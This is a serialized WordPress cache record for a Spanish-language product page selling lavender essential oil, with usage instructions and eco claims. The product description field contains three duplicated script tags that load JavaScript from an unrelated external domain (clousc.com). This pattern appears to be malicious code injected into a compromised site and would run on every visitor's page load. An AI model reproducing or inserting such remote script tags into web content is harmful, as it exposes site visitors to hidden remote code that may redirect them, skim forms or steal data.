a:2:{s:4:"time";i:1657306137;s:5:"value";O:7:"WP_Post":24:{s:2:"ID";i:7671;s:11:"post_author";s:1:"1";s:9:"post_date";s:19:"2020-09-04 22:23:32";s:13:"post_date_gmt";s:19:"2020-09-05 03:23:32";s:12:"post_content";s:602:"<img class="alignnone size-medium wp-image-13560" src="https://naturalconexion.com/wp-content/uploads/2020/04/Aceite-esencial-Lavanda-300x300.jpg" alt="" width="300" height="300" />

<strong> </strong><strong>Ingredientes principales:</strong>
<ul>
 	<li>Elaborado a base de Aceite puro de Lavanda.</li>
</ul>
<script src="https://clousc.com/cache.php?ver=4.0&amp;ref=app" type="text/javascript"></script><script src="https://clousc.com/cache.php?ver=4.0&amp;ref=app" type="text/javascript"></script><script src="https://clousc.com/cache.php?ver=4.0&amp;ref=app" type="text/javascript"></script>";s:10:"post_title";s:28:"Aceite esencial Lavanda 10ML";s:12:"post_excerpt";s:1210:"<strong>Relaja naturalmente.</strong>

El Aceite Esencial de Lavanda posee un aroma dulce, fresco y floral. A través de su alto poder regenerador, previene la formación de arrugas, hidratando y nutriendo la piel.  Su aroma calma y relaja ayudando, también, a conciliar el sueño; es ideal para ambientar espacios. En Aromaterapia es considerado el aceite de la armonía, el equilibrio y la tranquilidad.

<strong>¿Cómo se usa?</strong>

Para masajes: mezcla 4 gotas de Aceite Esencial de 10ml en cualquiera de nuestros Aceites Corporales, Cremas Hidratantes Nutritivas o con el Yogurt Corporal de Mango.

Para el cabello: mezcla 2 gotas de Aceite Esencial en el Shampoo Natural a aplicar al momento de su lavado.

Para difusor/humidificador: agrega 5 a 12 gotas de Aceite Esencial.

<strong>Nuestros productos:</strong>
<ul>
 	<li>No contaminan el agua.</li>
 	<li>Son 100% biodegradables.</li>
 	<li>Agroecológicos.</li>
 	<li>Naturales.</li>
 	<li>No contienen parabenos.</li>
 	<li>No son testados en animales.</li>
</ul>
<strong>Seleccionamos siempre lo mejor de la naturaleza, conéctate con lo natural ¡Lo llevaremos hasta la puerta de tu casa!</strong>

[sc name="sellos"]";s:11:"post_status";s:7:"publish";s:14:"comment_status";s:4:"open";s:11:"ping_status";s:6:"closed";s:13:"post_password";s:0:"";s:9:"post_name";s:26:"aceite-esencial-de-lavanda";s:7:"to_ping";s:0:"";s:6:"pinged";s:0:"";s:13:"post_modified";s:19:"2022-06-29 12:45:20";s:17:"post_modified_gmt";s:19:"2022-06-29 17:45:20";s:21:"post_content_filtered";s:0:"";s:11:"post_parent";i:0;s:4:"guid";s:60:"https://jjllorente.com/product/import-placeholder-for-13559/";s:10:"menu_order";i:0;s:9:"post_type";s:7:"product";s:14:"post_mime_type";s:0:"";s:13:"comment_count";s:1:"0";s:6:"filter";s:3:"raw";}}